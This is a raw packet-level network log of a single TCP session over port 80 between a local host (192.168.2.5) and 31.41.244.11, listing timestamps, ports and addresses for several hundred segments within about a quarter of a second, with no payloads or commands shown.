Dec 17, 2024 06:03:20.091588974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.091748953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.091810942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.092696905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.092742920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.092819929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.092864990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.093529940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.093580008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.093656063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.093703032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.094636917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.094774008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.094841003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.096103907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.096142054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.096169949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.096185923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.097297907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.097332954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.097347021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.097372055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.097959995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.098090887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.098140001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.099294901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.099349022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.099412918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.099459887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.100395918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.100431919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.100445986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.100476980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.101408958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.101463079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.101464033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.101509094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.102478981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.102528095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.102602959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.102643967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.103725910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.103761911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.103791952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.103806019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.104880095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.104963064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.104995966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.105012894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.105803967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.105906963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.105931044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.105947018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.106983900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.107019901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.107060909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.107074976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.108706951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.108772993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.109384060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.109433889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.109694004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.109728098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.109810114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.109913111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.110527039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.110560894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.110618114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.111579895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.111663103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.111718893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.111813068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.112623930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.112690926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.112900019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.113774061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.113827944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.113904953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.114927053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.114975929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.115051985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.115816116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.116121054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.116154909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.116204023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.117032051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.117194891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.117247105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.118236065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.118271112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.118321896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.119268894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.119327068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.119407892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.119750977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.120497942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.120534897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.120565891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.120578051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.121540070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.121639013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.121678114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.121721983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.122668028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.122720957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.122802973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.122901917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.123833895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.123868942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.123881102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.123922110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.124799967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.124849081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.124938011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.124984980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.126095057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.126130104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.126159906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.126180887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.127120018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.127180099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.127260923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.127355099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.128053904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.128109932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.128144979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.128192902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.130198002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.130233049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.130264997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.130291939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.131200075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.131261110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.131414890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.131448984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.131504059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.131730080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.131784916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.132846117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.132879972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.132898092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.132921934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.133824110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.133898020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.133960962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.134011984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.134912014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.134946108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.134968042 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.134985924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.135842085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.135951996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.135951996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.136146069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.136970043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.137031078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.137094021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.137144089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.138061047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.138130903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.138185978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.138231039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.139247894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.139301062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.139303923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.139355898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.140296936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.140347004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.274440050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.274564028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.274676085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.274893045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.275021076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.275088072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.276002884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.276118040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.276171923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.277095079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.277148008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.277209997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.277602911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.278232098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.278290987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.278309107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.278363943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.279309988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.279386044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.279436111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.279483080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.280466080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.280577898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.280630112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.281577110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.281691074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.281749964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.282684088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.282735109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.282738924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.283782959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.283818960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.283835888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.283898115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.283948898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.284929991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.284979105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.285034895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.286017895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.286128998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.286186934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.287199974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.287254095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.287377119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.287817955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.288321972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.288397074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.288417101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.288474083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.289346933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.289469004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.289525986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.290478945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.290613890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.290663958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.291603088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.291654110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.291701078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.291821003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.292714119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.292748928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.292813063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.294205904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.294240952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.294243097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.294270992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.294281960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.294930935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.294985056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.295043945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.295092106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.296103001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.296211004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.296262026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.297200918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.297235966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.297290087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.298372030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.298408985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.298460007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.299424887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.299483061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.299551964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.299813986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.300618887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.300653934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.300674915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.300693035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.301645994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.301762104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.301810980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.302736044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.303503036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.303556919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.303806067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.303833008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.303890944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.307959080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308007002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308044910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308047056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.308067083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308090925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308104992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308108091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.308136940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.308495045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308511019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.308541059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.308563948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.309815884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.309832096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.309881926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.309895039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.310492992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.310614109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.310668945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.311599970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.311737061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.311786890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.312717915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.312825918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.312880039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.316346884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.316514969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.316548109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.316570044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.316582918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.316591978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.316615105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.316632986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.316649914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.316659927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.316696882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.317397118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.317430973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.317447901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.317476034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.318999052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.319032907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.319050074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.319071054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.319715023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.319767952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.320074081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.321012974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.321046114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.321063995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.321093082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.321844101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.321877003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.321893930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.321923018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.322907925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.322958946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.323257923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.323328972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.324460983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.324496984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.324553013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.325000048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.325126886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.325179100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.326117039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.326172113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.326232910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.327233076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.327286959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.327366114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.327816963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.328339100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.328516006 CET	80	49850	31.41.244.11	192.168.2.5
